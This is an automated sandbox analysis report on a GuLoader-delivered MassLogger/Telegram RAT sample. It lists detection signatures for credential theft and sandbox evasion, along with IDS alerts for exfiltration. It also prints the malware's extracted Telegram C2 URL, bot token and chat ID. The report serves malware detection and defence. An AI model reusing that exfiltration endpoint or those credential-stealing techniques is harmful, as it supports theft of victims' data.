Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rXKfKM0T49.exe

Overview

General Information

Sample name:rXKfKM0T49.exe
renamed because original name is a hash value
Original sample name:28d6a2e755f646875e1ed22b6e8443e074e2fa7730d4f202ffe21c48db789fad.exe
Analysis ID:1588260
MD5:948a8f01fca4eecddbcb1c20b26a0a53
SHA1:f1254c7c3a1051c4624072c07f725aa62ff4a316
SHA256:28d6a2e755f646875e1ed22b6e8443e074e2fa7730d4f202ffe21c48db789fad
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • rXKfKM0T49.exe (PID: 5380 cmdline: "C:\Users\user\Desktop\rXKfKM0T49.exe" MD5: 948A8F01FCA4EECDDBCB1C20B26A0A53)
    • rXKfKM0T49.exe (PID: 1072 cmdline: "C:\Users\user\Desktop\rXKfKM0T49.exe" MD5: 948A8F01FCA4EECDDBCB1C20B26A0A53)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.1814401893.0000000003E6F000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000003.00000002.2624047215.00000000022BF000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 3 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T23:12:00.281914+010020577441Malware Command and Control Activity Detected192.168.2.949977149.154.167.220443TCP
            2025-01-10T23:12:02.042849+010020577441Malware Command and Control Activity Detected192.168.2.949979149.154.167.220443TCP
            2025-01-10T23:12:03.589477+010020577441Malware Command and Control Activity Detected192.168.2.949981149.154.167.220443TCP
            2025-01-10T23:12:05.263746+010020577441Malware Command and Control Activity Detected192.168.2.949983149.154.167.220443TCP
            2025-01-10T23:12:06.806211+010020577441Malware Command and Control Activity Detected192.168.2.949985149.154.167.220443TCP
            2025-01-10T23:12:08.373482+010020577441Malware Command and Control Activity Detected192.168.2.949987149.154.167.220443TCP
            2025-01-10T23:12:09.991034+010020577441Malware Command and Control Activity Detected192.168.2.949989149.154.167.220443TCP
            2025-01-10T23:12:11.627973+010020577441Malware Command and Control Activity Detected192.168.2.949992149.154.167.220443TCP
            2025-01-10T23:12:13.282728+010020577441Malware Command and Control Activity Detected192.168.2.949994149.154.167.220443TCP
            2025-01-10T23:12:14.861651+010020577441Malware Command and Control Activity Detected192.168.2.949996149.154.167.220443TCP
            2025-01-10T23:12:17.130510+010020577441Malware Command and Control Activity Detected192.168.2.949998149.154.167.220443TCP
            2025-01-10T23:12:18.755647+010020577441Malware Command and Control Activity Detected192.168.2.950000149.154.167.220443TCP
            2025-01-10T23:12:20.282175+010020577441Malware Command and Control Activity Detected192.168.2.950002149.154.167.220443TCP
            2025-01-10T23:12:21.929004+010020577441Malware Command and Control Activity Detected192.168.2.950004149.154.167.220443TCP
            2025-01-10T23:12:23.510404+010020577441Malware Command and Control Activity Detected192.168.2.950006149.154.167.220443TCP
            2025-01-10T23:12:26.221835+010020577441Malware Command and Control Activity Detected192.168.2.950008149.154.167.220443TCP
            2025-01-10T23:12:27.866639+010020577441Malware Command and Control Activity Detected192.168.2.950010149.154.167.220443TCP
            2025-01-10T23:12:29.438612+010020577441Malware Command and Control Activity Detected192.168.2.950012149.154.167.220443TCP
            2025-01-10T23:12:30.991536+010020577441Malware Command and Control Activity Detected192.168.2.950014149.154.167.220443TCP
            2025-01-10T23:12:32.714699+010020577441Malware Command and Control Activity Detected192.168.2.950016149.154.167.220443TCP
            2025-01-10T23:12:34.305790+010020577441Malware Command and Control Activity Detected192.168.2.950018149.154.167.220443TCP
            2025-01-10T23:12:35.900793+010020577441Malware Command and Control Activity Detected192.168.2.950020149.154.167.220443TCP
            2025-01-10T23:12:37.515075+010020577441Malware Command and Control Activity Detected192.168.2.950022149.154.167.220443TCP
            2025-01-10T23:12:39.041100+010020577441Malware Command and Control Activity Detected192.168.2.950024149.154.167.220443TCP
            2025-01-10T23:12:40.813386+010020577441Malware Command and Control Activity Detected192.168.2.950026149.154.167.220443TCP
            2025-01-10T23:12:42.356372+010020577441Malware Command and Control Activity Detected192.168.2.950028149.154.167.220443TCP
            2025-01-10T23:12:43.983727+010020577441Malware Command and Control Activity Detected192.168.2.950030149.154.167.220443TCP
            2025-01-10T23:12:45.635718+010020577441Malware Command and Control Activity Detected192.168.2.950032149.154.167.220443TCP
            2025-01-10T23:12:47.246674+010020577441Malware Command and Control Activity Detected192.168.2.950034149.154.167.220443TCP
            2025-01-10T23:12:48.883420+010020577441Malware Command and Control Activity Detected192.168.2.950036149.154.167.220443TCP
            2025-01-10T23:12:50.406858+010020577441Malware Command and Control Activity Detected192.168.2.950038149.154.167.220443TCP
            2025-01-10T23:12:52.085861+010020577441Malware Command and Control Activity Detected192.168.2.950040149.154.167.220443TCP
            2025-01-10T23:12:53.725174+010020577441Malware Command and Control Activity Detected192.168.2.950042149.154.167.220443TCP
            2025-01-10T23:12:55.278857+010020577441Malware Command and Control Activity Detected192.168.2.950044149.154.167.220443TCP
            2025-01-10T23:12:56.980269+010020577441Malware Command and Control Activity Detected192.168.2.950046149.154.167.220443TCP
            2025-01-10T23:13:01.679383+010020577441Malware Command and Control Activity Detected192.168.2.950048149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T23:11:52.664493+010028032742Potentially Bad Traffic192.168.2.949975132.226.247.7380TCP
            2025-01-10T23:11:59.398915+010028032742Potentially Bad Traffic192.168.2.949975132.226.247.7380TCP
            2025-01-10T23:12:01.242641+010028032742Potentially Bad Traffic192.168.2.949978132.226.247.7380TCP
            2025-01-10T23:12:02.789544+010028032742Potentially Bad Traffic192.168.2.949980132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T23:11:47.560964+010028032702Potentially Bad Traffic192.168.2.949972216.58.206.46443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T23:12:00.055572+010018100081Potentially Bad Traffic192.168.2.949977149.154.167.220443TCP
            2025-01-10T23:12:01.813771+010018100081Potentially Bad Traffic192.168.2.949979149.154.167.220443TCP
            2025-01-10T23:12:03.365561+010018100081Potentially Bad Traffic192.168.2.949981149.154.167.220443TCP
            2025-01-10T23:12:04.932807+010018100081Potentially Bad Traffic192.168.2.949983149.154.167.220443TCP
            2025-01-10T23:12:06.599379+010018100081Potentially Bad Traffic192.168.2.949985149.154.167.220443TCP
            2025-01-10T23:12:08.162259+010018100081Potentially Bad Traffic192.168.2.949987149.154.167.220443TCP
            2025-01-10T23:12:09.776645+010018100081Potentially Bad Traffic192.168.2.949989149.154.167.220443TCP
            2025-01-10T23:12:11.295791+010018100081Potentially Bad Traffic192.168.2.949992149.154.167.220443TCP
            2025-01-10T23:12:12.996532+010018100081Potentially Bad Traffic192.168.2.949994149.154.167.220443TCP
            2025-01-10T23:12:14.599622+010018100081Potentially Bad Traffic192.168.2.949996149.154.167.220443TCP
            2025-01-10T23:12:16.206189+010018100081Potentially Bad Traffic192.168.2.949998149.154.167.220443TCP
            2025-01-10T23:12:18.465680+010018100081Potentially Bad Traffic192.168.2.950000149.154.167.220443TCP
            2025-01-10T23:12:20.069772+010018100081Potentially Bad Traffic192.168.2.950002149.154.167.220443TCP
            2025-01-10T23:12:21.674756+010018100081Potentially Bad Traffic192.168.2.950004149.154.167.220443TCP
            2025-01-10T23:12:23.301443+010018100081Potentially Bad Traffic192.168.2.950006149.154.167.220443TCP
            2025-01-10T23:12:25.862990+010018100081Potentially Bad Traffic192.168.2.950008149.154.167.220443TCP
            2025-01-10T23:12:27.550625+010018100081Potentially Bad Traffic192.168.2.950010149.154.167.220443TCP
            2025-01-10T23:12:29.219177+010018100081Potentially Bad Traffic192.168.2.950012149.154.167.220443TCP
            2025-01-10T23:12:30.766263+010018100081Potentially Bad Traffic192.168.2.950014149.154.167.220443TCP
            2025-01-10T23:12:32.422148+010018100081Potentially Bad Traffic192.168.2.950016149.154.167.220443TCP
            2025-01-10T23:12:34.024915+010018100081Potentially Bad Traffic192.168.2.950018149.154.167.220443TCP
            2025-01-10T23:12:35.619872+010018100081Potentially Bad Traffic192.168.2.950020149.154.167.220443TCP
            2025-01-10T23:12:37.213771+010018100081Potentially Bad Traffic192.168.2.950022149.154.167.220443TCP
            2025-01-10T23:12:38.823917+010018100081Potentially Bad Traffic192.168.2.950024149.154.167.220443TCP
            2025-01-10T23:12:40.369055+010018100081Potentially Bad Traffic192.168.2.950026149.154.167.220443TCP
            2025-01-10T23:12:42.142601+010018100081Potentially Bad Traffic192.168.2.950028149.154.167.220443TCP
            2025-01-10T23:12:43.684809+010018100081Potentially Bad Traffic192.168.2.950030149.154.167.220443TCP
            2025-01-10T23:12:45.322823+010018100081Potentially Bad Traffic192.168.2.950032149.154.167.220443TCP
            2025-01-10T23:12:46.956393+010018100081Potentially Bad Traffic192.168.2.950034149.154.167.220443TCP
            2025-01-10T23:12:48.591683+010018100081Potentially Bad Traffic192.168.2.950036149.154.167.220443TCP
            2025-01-10T23:12:50.197296+010018100081Potentially Bad Traffic192.168.2.950038149.154.167.220443TCP
            2025-01-10T23:12:51.750955+010018100081Potentially Bad Traffic192.168.2.950040149.154.167.220443TCP
            2025-01-10T23:12:53.422065+010018100081Potentially Bad Traffic192.168.2.950042149.154.167.220443TCP
            2025-01-10T23:12:55.063104+010018100081Potentially Bad Traffic192.168.2.950044149.154.167.220443TCP
            2025-01-10T23:12:56.595449+010018100081Potentially Bad Traffic192.168.2.950046149.154.167.220443TCP
            2025-01-10T23:13:01.340423+010018100081Potentially Bad Traffic192.168.2.950048149.154.167.220443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: rXKfKM0T49.exeAvira: detected
            Found malware configuration
            Source: 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
            Source: rXKfKM0T49.exe.1072.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
            Multi AV Scanner detection for submitted file
            Source: rXKfKM0T49.exeVirustotal: Detection: 75%Perma Link
            Source: rXKfKM0T49.exeReversingLabs: Detection: 78%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378AD1EC CryptUnprotectData,3_2_378AD1EC
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378AD9D9 CryptUnprotectData,3_2_378AD9D9
            Source: rXKfKM0T49.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49976 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.9:49972 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.9:49974 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49977 version: TLS 1.2
            Source: rXKfKM0T49.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_00402868 FindFirstFileW,3_2_00402868
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_0040672B FindFirstFileW,FindClose,3_2_0040672B
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405AFA
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 378AC985h3_2_378AC638
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 378A1042h3_2_378A0C28
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 378A0671h3_2_378A03C4
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 378AEA48h3_2_378AE790
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 378A1042h3_2_378A0F6F
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 378AE198h3_2_378ADEE1
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 378AC041h3_2_378ABD9C
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 378AB791h3_2_378AB4EC
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 378A1042h3_2_378A0C1B
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 378AEEA0h3_2_378AEBF2
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 378AE5F0h3_2_378AE339
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 378ADD40h3_2_378ADA89
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 378AC499h3_2_378AC1F2
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 378ABBE9h3_2_378AB930
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 378AF2F8h3_2_378AF054
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 378AB339h3_2_378AB07F
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then push 00000000h3_2_384EBDF0
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E882Dh3_2_384E8650
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E91B7h3_2_384E8650
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E6A68h3_2_384E67C0
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E1B00h3_2_384E1858
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E7318h3_2_384E7070
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E4ACAh3_2_384E4820
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E23B0h3_2_384E2108
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then push 00000000h3_2_384EC92F
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_384E8193
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E2C60h3_2_384E29B8
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E3510h3_2_384E3268
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E54B0h3_2_384E5208
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E5D60h3_2_384E5AB8
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E6610h3_2_384E6368
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_384E7B62
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_384E8373
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E3DC0h3_2_384E3B18
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E4670h3_2_384E43C8
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_384ECBE7
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E16A8h3_2_384E1400
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E6EC0h3_2_384E6C18
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E7770h3_2_384E74C8
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E1F58h3_2_384E1CB0
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E2808h3_2_384E2560
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E5058h3_2_384E4DB0
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E5908h3_2_384E5660
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E30B8h3_2_384E2E10
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E3968h3_2_384E36C0
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E4218h3_2_384E3F70
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E61B8h3_2_384E5F10
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then jmp 384E1250h3_2_384E0FA8
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 4x nop then push 00000000h3_2_38A1E790

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49977 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49979 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49977 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49979 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49992 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49992 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50016 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50016 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49994 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49994 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49989 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50022 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50022 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50004 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50046 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50004 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49996 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50002 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50002 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50024 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49996 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50046 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50024 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50042 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50032 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50042 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50032 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49998 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49989 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50000 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49998 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50018 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50018 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50000 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50040 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50040 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50014 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50008 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50008 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50020 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50020 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50048 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50012 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50012 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49985 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49985 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49981 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49981 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50026 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50026 -> 149.154.167.220:443
